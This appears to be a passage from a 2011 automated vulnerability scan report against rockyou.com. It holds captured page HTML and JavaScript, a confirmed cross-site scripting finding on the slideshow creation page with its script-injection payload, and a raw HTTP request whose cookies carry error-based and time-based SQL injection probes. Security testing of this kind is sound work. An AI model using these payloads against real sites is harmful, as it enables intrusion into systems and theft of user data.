type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> <meta name="title" content="RockYou Slideshow" />
<meta name="description" content="Check out my new photos from RockYou.com." />
<link rel="image_src" href="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" />
<link rel="video_src" href="http://apps.rockyou.com/rockyou.swf?instanceid='+netsparker(9)+'"/>
<meta name="video_height" content="320" />
<meta name="video_width" content="426" />
<meta name="video_type" content="application/x-shockwave-flash" /></HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-button" style="font-weight:bold"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-create&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fchoose_widget.php">CREATE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-browse&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Ffeaturedartists.php">BROWSE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-mystuff&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fmy_stuff.php">MY STUFF</a></div> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-login&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Log In</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-register&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Register</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png");'> <img src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" class="transparent"/> </div> </div> </div> <br>
<script type="text/javascript">
function thickBoxFrame(msg, url){
//alert(url);
url = url+'?KeepThis=true&TB_iframe=true&height=310&width=370';
TB_show('fff', 'http://www.google.com', '');
}
function getImgLink(img_src, img_cap) { var first_dot_index = img_src.indexOf('.') + 1; var rest_url = img_src.slice(first_dot_index,img_src.length); var second_dot_index = rest_url.indexOf('.'); var second_slice_index = rest_url.indexOf('/')+ first_dot_index ; var partner_name = rest_url.slice(0,second_dot_index); var partner_url = img_src; partner_url = img_src.slice(0,second_slice_index); //alert( '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\">rest_url</a>'); if (partner_name == 'badongo'){ img_src= img_src.replace('/ry/','/pic/').replace('.jpg',''); return '<a href=\"'+img_src+'\" target="_blank" title=\"'+img_cap+'\">view pic<br>('+partner_name+')</a>'; }else{ return '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\" onclick=\"ajax_post_john(\'/events/include/ajaxtrackevent.php\',\'name=rockyou-mobile&value=showmygallery\',null,null);\">view pic<br>('+partner_name+')</a>'; } }
function deleteComment(url) {
deleteme = confirm("Delete This Comment?");
if (deleteme) {
window.location=url;
}
}
function deletethis (e) {
if (!e) var e = window.event;
var tg = (e.target) ? e.target : e.srcElement
removeObj(tg.parentNode);
}
function removeObj(tr){
tr.parentNode.removeChild(tr);
}
function addtxtbox()
{
table=document.getElementById('tbltext');
mycurrent_row=document.createElement("TR");
mycurrent_cell=document.createElement("TD");
try
{
mycurrent_cell.innerHTML="<input type=\"text\" name=\"to[]\" class=\"textboxcl2\"> <input type=\"button\" value=\"Remove\" onclick=\"deletethis(event)\">";
}
catch(e)
{
mytextbox=document.createElement("INPUT");
mytextbox.setAttribute("type","text");
mytextbox.setAttribute("name","to[]");
mytextbox.setAttribute("class","textboxcl2");
mycurrent_cell.appendChild(mytextbox);
mybutton=document.createElement("INPUT");
mybutton.setAttribute("type","Button");
mybutton.setAttribute("value","Remove");
mybutton.setAttribute("onclick","alert('this')");
mycurrent_cell.appendChild(mybutton);
}
mycurrent_row.appendChild(mycurrent_cell);
table.getElementsByTagName('tbody')[0].appendChild(mycurrent_row);
}
function xmlhttpPostURL(type,data,url) {
var xmlHttpReq = false;
var self = this;
// Mozilla/Safari
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}
// IE
else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
self.xmlHttpReq.open('POST', url+"?instanceid=&#039;+netsparker(9)+&#039;", true);
self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8");
self.xmlHttpReq.onreadystatechange = function() {
if (self.xmlHttpReq.readyState == 4) {
//alert(self.xmlHttpReq.responseXML);
notXML = false;
if (self.xmlHttpReq.responseXML)
{
//eval ("var resp = "+self.xmlHttpReq.responseText);
xmlDoc = self.xmlHttpReq.responseXML.documentElement;
if (xmlDoc)
{
var thumbClass = (navigator.appVersion.indexOf('MSIE 6') == -1) ? 'smallthumb' : 'smallthumbIE6';
imageList = xmlDoc.getElementsByTagName("image");
capList = xmlDoc.getElementsByTagName("text");
imgs = "";
if (thumbnailStart > imageList.length) thumbnailStart -= calcThumbnailsCount();
if (thumbnailStart < 0) thumbnailStart = 0;
thumbnailEnd = thumbnailStart + calcThumbnailsCount();
if (thumbnailEnd > imageList.length) thumbnailEnd = imageList.length;
for (i = 0; i < imageList.length; i++)
{
img_src = imageList[i].getAttribute("path");
img_cap = URLDecode(capList[i].getAttribute("text"));
img_link = getImgLink(img_src, img_cap);
if ((i >= thumbnailStart) && (i < thumbnailEnd)) {
imgs += "<div class='thumbwrap'>";
} else {
imgs += "<div class='thumbwrap' style='display:none'>";
}
imgs += "<a href='"+img_src+"' rel='lightbox[show]'><img src='"+img_src+"' class='"+thumbClass+"' title=\""+img_cap+"\"></a><br><img src='/images/icons/mobilephone.gif' style='margin-top:8px;margin-left:7px;cursor:pointer;float:left' onclick=\"ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-mobile&value=showmygallery',null,null); window.open('http://photofun.funmo.com/rockyou/photos/new?orig_url="+escape(img_src)+"','tomobile','width=776,height=585,status=no,toolbar=no,menubar=no,scrollbars=no,resizable=yes,location=no,directories=no,status=no');return false;\">";
imgs += img_link+"</div>";
}
document.getElementById("photothumbs").innerHTML = imgs;
initLightbox();
actionJump();
}
else
{
notXML = true;
}
}
else
{
notXML = true;
}
if (notXML)
{
eval ("var resp = "+self.xmlHttpReq.responseText);
if (resp['mode']=='vote')
{
//set new Rating and Votes
document.getElementById('current-rating').style.width=30*resp['data'][0];
document.getElementById('current-vote').innerHTML=resp['data'][1]+' Votes';
}
}
}
}
self.xmlHttpReq.send(type+"="+escape(data));
}
function URLDecode(psEncodeString)
{
var lsRegExp = /\+/g;
return unescape(String(psEncodeString).replace(lsRegExp, " "));
}
function setStartSlide(slide)
{
document.getElementById('flashsrc').innerHTML='<embed src="http://apps.rockyou.com/rockyou.swf?instanceid=&#039;+netsparker(9)+&#039;&startSlide='+slide+'" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/>';
}
function initPage()
{
xmlhttpPostURL("1",'',"xmlproxy.php");
}
if (window.addEventListener) {
window.addEventListener('load',initPage,false);
}
else window.attachEvent('onload',initPage);
function actionJump()
{
}
function rate_vote(vote)
{
xmlhttpPostURL("vote",vote,"show_my_gallery-ajax.php");
//alert(vote);
}
function rate_display(vote)
{
var note = "";
switch (vote)
{
case 1:
note = "Total Junk";
break;
case 2:
note = "Kinda Lame";
break;
case 3:
note = "Its OK";
break;
case 4:
note = "Pretty Good";
break;
case 5:
note = "Way Hot";
break;
}
document.getElementById('ratingtitle').innerHTML=note;
}
function rate_displayout()
{
document.getElementById('ratingtitle').innerHTML = "Rate Me!";
}
</script>
<div id="container" style='width:1125px;margin:auto;padding-top:15px'>
<div style="float:left;width:800px">
<table id="photothumbscontainer" style="margin-bottom:15px;" cellpadding="0" cellspacing="0" ><tr>
<td><img src="/images/thumbnailsLeft.gif" onclick="thumbnailStart-=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
<td id="photothumbs" style="width:800px; height:94px; background:#300018; padding: 2px 0; font-size:10px; vertical-align:bottom"> </td>
<td><img src="/images/thumbnailsRight.gif" onclick="thumbnailStart+=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
</tr></table>
<div id="contentwrapper" style="float:left" >
<div id="contentcolumn" style="width:500px" align="center">
<div align="left" style="width:500px">
<div style="width:425px;margin:0 auto;border:2px solid red;background:red;text-align:center;color:white">PRIVATE SLIDESHOW</div> <div id="slideshow-container" style="width:450px; height:300px; margin:0px auto 20px; border: 1px solid #a80050">
<div id='flashsrc'>
<table cellpadding="0" cellspacing="0" border="0">
<tr valign="top">
<td><div id="embeddiv"></div></td>
<td>
<div style="width:100px;height:100px;position:absolute;">
<!--script type="text/javascript">var likeParams = ['01078cba91618ea1','drawerbutton'];</script><script type="text/javascript" src="http://partner.like.com/likesense/rockyou.js"></script-->
</div>
</td>
</tr>
</table>
</div>
</div>
<style>
#photothumbs a:link {color:#ffffff;}
</style>
<table style="margin: 0 auto; clear:both" width="450px"><tr>
<script>
function showPagelet(p) {
document.getElementById('sharePagelet').style.display='none';
document.getElementById('ratePagelet').style.display='none';
document.getElementById(p).style.display='';
}
</script>
<td><a href="#" onclick="ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-share&value=showmygallery',null,null); showPagelet('sharePagelet'); return false;">SHARE</a></td>
<td><a href="#" onclick="showPagelet('ratePagelet'); return false;">RATE</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-makeaslideshow&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fviewpage_clickthrough.php%3Fwidget%3Dslideshow%26instanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">MAKE A SLIDESHOW</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-addtofavorites&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Faddfavorite.php%3Finstanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">ADD TO FAVORITES</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-report&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fsetinappropriate.php%3Finstanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">REPORT</a></td>
</tr></table>
<div id="ajaxarea" style="width:450px; height:100px; background: #f51768; margin: 10px auto" >
<div id="sharePagelet" style="padding: 10..
|
- /slideshow-create.php
/slideshow-create.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| source | GET | ></script><script>alert(9)</script> |
| create | GET | 1 |
| instanceid | GET | 3 |
Request
GET /slideshow-create.php?source=%3E%3C/script%3E%3Cscript%3Enetsparker(9)%3C/script%3E&create=1&instanceid=3 HTTP/1.1
Referer: http://www.rockyou.com/slideshow-create.php?source=br
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166157; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/slideshow-create.php?source=br
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166157; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:35:59 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:35:58 GMT; path=/; domain=.rockyou.com,lastlogin=1303166159; expires=Wed, 27-Jul-2011 22:35:59 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:35:59 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:35:59 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:35:59 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=29256 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26912
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '3';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "></script><script>netsparker(9)</script>";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSections();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); var slidelist = []; slidePrint(slidelist); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = ["","mokina"]; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?source=%3E%3C/script%3E%3Cscript%3Enetsparker(9)%3C/script%3E&create=1&instanceid=3&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if 